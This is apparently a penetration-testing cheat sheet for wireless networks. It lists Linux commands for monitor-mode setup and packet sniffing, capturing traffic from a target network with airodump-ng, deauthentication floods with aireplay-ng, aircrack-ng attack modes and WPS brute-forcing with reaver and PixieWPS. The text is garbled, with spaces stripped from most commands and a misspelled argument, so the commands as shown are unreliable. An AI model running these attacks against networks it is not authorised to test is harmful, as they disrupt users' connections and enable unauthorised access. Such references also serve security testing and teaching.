# View Current WiFi Driver
sudoairmon-ng
nmcli# if PCI device
lsusb# if USB device# List Driver Info and Params
sudomodinfo<driver>
# Modify Driver Parameters
sudomodprobe<driver><param>=<value>
# List Loaded Kernel Modules
lsmod
# Remove Kernel Module / Dependencies
sudormmod<driver># Might need to specify dependencies if an error returns
# Return detailed wireless interface information
sudoiwlist
# Scan for Wi-Fi signals on a specified interface
sudoiwdev<dev>scan# | grep "SSID:|DS Parameter set:"# Add a separate monitor mode interface based on an existing interface
sudoiwdev<interface>interfaceadd<monitor_name>typemonitor
# Bring new interface up
sudoiplinkset<monitor_name>up
# Get information on new interface
sudoiwdev<monitor_name>info
# Sniff traffic new monitor interface
sudotcpdump-i<monitor_name>
# Delete monitor interface
sudoiwdev<monitor_name>interfacedel
# Get Current Wi-Fi Regulatory Domain
sudoiwregget
# Set Wi-Fi Regulatory Domain (Volatile / In-Memory)
sudoiwregsetUS
# Set Wi-Fi Regulatory Domain (Persistent)
sudonano/etc/default/crda# example: REGDOMAIN=US# List RF Devices
sudorfkilllist
# Soft Block Management
sudorfkillblock<device_id>
sudorfkillunblock<device_id>
# See available networks/channels
sudoairodump-ng<mon_interface>
# Specify channel to hone in on a target network and output to file
sudoairodump-ng--bssid<target_bssid>-c<channel>--write<outfile><mon_intercace>
### New Terminal #### See if network interface can communicate with target
sudoaireplay-ng-9-a<target_bssid><mon_interface>
# If successful, you should be able to inject/deauth
sudoaireplay-ng--deauth100-a<target_bssid><mon_interface>
### AIRCRACK ###
sudoaircrack-ng
# 0 ## Deauthentication# 1 ## Fake Authentication# 2 ## Interactive Packet Replay# 3 ## ARP Request Replay Attack# 4 ## KoreK ChopChop Attack# 5 ## Fragmentation Attack# 6 ## Café-Latte Attack# 7 ## Client-Oriented Fragmentation Attack# 9 ## Injection Test
# Query for networks with WPS support
sudowash-i<mon_interface>
# Bruteforce a target WPS Network
sudoreaver-b<bssid>-c<channel>-iwlan0mon-v
# Bruteforce a target WPS Network with PixieWPS (faster)
sudoreaver-b<bssid>-c<channel>-iwlan0mon-v-K